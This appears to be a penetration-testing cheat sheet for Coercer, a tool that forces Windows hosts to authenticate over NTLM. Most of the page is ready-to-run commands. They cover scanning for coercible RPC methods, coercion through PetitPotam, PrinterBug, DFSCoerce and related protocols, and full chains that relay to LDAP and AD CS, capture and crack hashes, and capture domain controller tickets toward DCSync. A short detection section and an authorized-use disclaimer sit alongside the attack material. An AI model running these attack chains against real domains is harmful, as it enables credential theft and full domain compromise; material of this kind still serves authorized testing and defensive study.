← All cheat sheets

COERCER

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Coercer is a tool to automatically coerce Windows hosts to authenticate.
Exploits various RPC protocols to force NTLM authentication.

INSTALLATION#

pip install coercer

# Or from source
git clone https://github.com/p0dalirius/Coercer
cd Coercer
pip install -r requirements.txt

BASIC USAGE#


    

SCAN FOR VULNERABLE METHODS#

# Scan target for coercible methods
coercer scan -t TARGET -u user -p 'password' -d DOMAIN

# Scan range
coercer scan -t 192.168.1.0/24 -u user -p 'password' -d DOMAIN

COERCE AUTHENTICATION#

# Coerce target to authenticate to listener
coercer coerce -t TARGET -l LISTENER -u user -p 'password' -d DOMAIN

# Specific method
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-method-name EfsRpcOpenFileRaw

# All available methods
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --always-continue

AUTHENTICATION OPTIONS#


    

PASSWORD#

coercer coerce -t TARGET -l LISTENER -u user -p 'password' -d DOMAIN

HASH#

coercer coerce -t TARGET -l LISTENER -u user -H 'NTHASH' -d DOMAIN

KERBEROS#

export KRB5CCNAME=ticket.ccache
coercer coerce -t TARGET -l LISTENER -u user -k -d DOMAIN

NULL SESSION#

coercer coerce -t TARGET -l LISTENER --no-auth

COERCION METHODS#


    

MS-EFSR (PetitPotam)#

# EFS Remote Protocol
# Methods: EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, etc.
coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR

MS-RPRN (PrinterBug)#

# Print System Remote Protocol
# Method: RpcRemoteFindFirstPrinterChangeNotification
coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-RPRN

MS-FSRVP (ShadowCoerce)#

# File Server Remote VSS Protocol
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-FSRVP

MS-DFSNM (DFSCoerce)#

# Distributed File System Namespace Management
coercer coerce -t DC -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-DFSNM

MS-EVEN (EventLog)#

# EventLog Remoting Protocol
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EVEN

FILTERING#


    

BY PROTOCOL#

coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR

BY METHOD#

coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-method-name EfsRpcOpenFileRaw

BY TRANSPORT#

# SMB only
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-transport smb

# HTTP only
coercer coerce -t TARGET -l LISTENER -u user -p pass -d DOMAIN --filter-transport http

LIST OPTIONS#

# List all protocols
coercer list --protocols

# List all methods
coercer list --methods

# List methods for protocol
coercer list --methods --filter-protocol-name MS-EFSR

ATTACK WORKFLOWS#


    

NTLM RELAY TO LDAP#

# 1. Start ntlmrelayx
ntlmrelayx.py -t ldap://DC -smb2support

# 2. Coerce DC to authenticate
coercer coerce -t DC -l ATTACKER -u user -p pass -d DOMAIN

# 3. Result: Add computer account, modify ACLs, etc.

NTLM RELAY TO AD CS#

# 1. Start ntlmrelayx
ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# 2. Coerce DC
coercer coerce -t DC -l ATTACKER -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR

# 3. Get DC certificate -> DCSync

CAPTURE HASH#

# 1. Start Responder
sudo responder -I eth0

# 2. Coerce target
coercer coerce -t TARGET -l ATTACKER -u user -p pass -d DOMAIN

# 3. Crack captured hash
hashcat -m 5600 hash.txt wordlist.txt

UNCONSTRAINED DELEGATION#

# 1. Monitor on unconstrained host
Rubeus.exe monitor /filteruser:DC$ /interval:5

# 2. Coerce DC
coercer coerce -t DC -l UNCONSTRAINED_HOST -u user -p pass -d DOMAIN

# 3. Capture and use TGT

WEBDAV COERCION#

# HTTP-based coercion (useful when SMB blocked)

# 1. Start WebDAV on attacker
# (WebDAV redirector triggers NTLM over HTTP)

# 2. Use HTTP coercion
coercer coerce -t TARGET -l ATTACKER@80 -u user -p pass -d DOMAIN --filter-transport http

SCANNING NETWORK#

# Find vulnerable hosts
coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN

# Output to file
coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN -o results.json

# Specific protocol
coercer scan -t 192.168.1.0/24 -u user -p pass -d DOMAIN --filter-protocol-name MS-EFSR

INDIVIDUAL TOOLS#


    

PETITPOTAM (Standalone)#

# If Coercer unavailable
python3 PetitPotam.py -d DOMAIN -u user -p pass LISTENER TARGET

# Unauthenticated (patched on most)
python3 PetitPotam.py LISTENER TARGET

PRINTERBUG (Standalone)#

python3 printerbug.py DOMAIN/user:password@TARGET LISTENER

DFSCOERCE (Standalone)#

python3 dfscoerce.py -d DOMAIN -u user -p pass LISTENER TARGET

DEFENSE DETECTION#

# These attacks trigger:
# - NTLM authentication events
# - RPC connection logs
# - Certificate requests (ADCS relay)
# - Account modifications (LDAP relay)

# Monitor for:
# - Event ID 4624 (Logon)
# - Event ID 5156 (RPC connections)
# - Unusual machine account activity

QUICK REFERENCE#

coercer scan -t TARGET -u user -p pass -d DOMAIN           # Scan for methods
coercer coerce -t TARGET -l LISTENER -u user -p pass       # Coerce auth
coercer coerce -t TARGET -l LISTENER --filter-protocol-name MS-EFSR  # PetitPotam
coercer coerce -t TARGET -l LISTENER --filter-protocol-name MS-RPRN  # PrinterBug
coercer coerce -t TARGET -l LISTENER --always-continue     # Try all methods
coercer list --protocols                                   # List protocols
coercer list --methods                                     # List methods